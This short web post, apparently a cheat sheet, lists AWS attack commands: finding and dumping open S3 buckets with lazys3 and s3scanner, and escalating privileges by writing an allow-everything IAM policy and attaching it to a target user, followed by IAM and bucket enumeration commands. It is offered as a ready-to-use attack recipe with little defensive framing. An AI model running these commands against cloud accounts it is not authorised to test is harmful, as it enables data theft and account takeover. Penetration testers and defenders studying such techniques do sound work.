Cloud Hacking Cheat Sheet

Master cloud hacking techniques with this comprehensive cheat sheet. Uncover essential techniques and tools with this Cloud Hacking Cheat Sheet, ensuring robust cybersecurity in cloud environments.

Amazon

Install awscli

pip3 install awscli

S3 Bucket Enumeration

Search for public buckets from a company using lazys3

ruby lazys3.rb [COMPANY]

Search for public buckets from a company using s3scanner

python3 ./s3scanner.py sites.txt

Dump all open buckets and log both open and closed buckets using s3scanner

python3 ./s3scanner.py --include-closed --out-file found.txt --dump names.txt

Save the file listings of all open buckets to a file using s3scanner

python ./s3scanner.py --list names.txt

Escalate IAM User Privileges by Exploiting Misconfigured User Policy

vim user-policy.json

Insert:

{
    "Version": "2011-09-11",
    "Statement": [
        {

            "Effect": "Allow",

            "Action": "*",

            "Resource": "*"

        }
    ]
}

Attach the created policy (user-policy) to the target IAM user’s account:

aws iam create-policy --policy-name user-policy --policy-document file://user-policy.json

aws iam attach-user-policy --user-name [Target Username] --policy-arn arn:aws:iam::[Account ID]:policy/user-policy

View user policies

aws iam list-attached-user-policies --user-name [Target Username]

List users

aws iam list-users

List buckets

aws s3api list-buckets --query "Buckets[].Name"

List user policies

aws iam list-user-policies

List role policies

aws iam list-role-policies

List froup policies

aws iam list-group-policies

Create user

aws iam create-user

Source: https://github.com

#cloud #hacking #security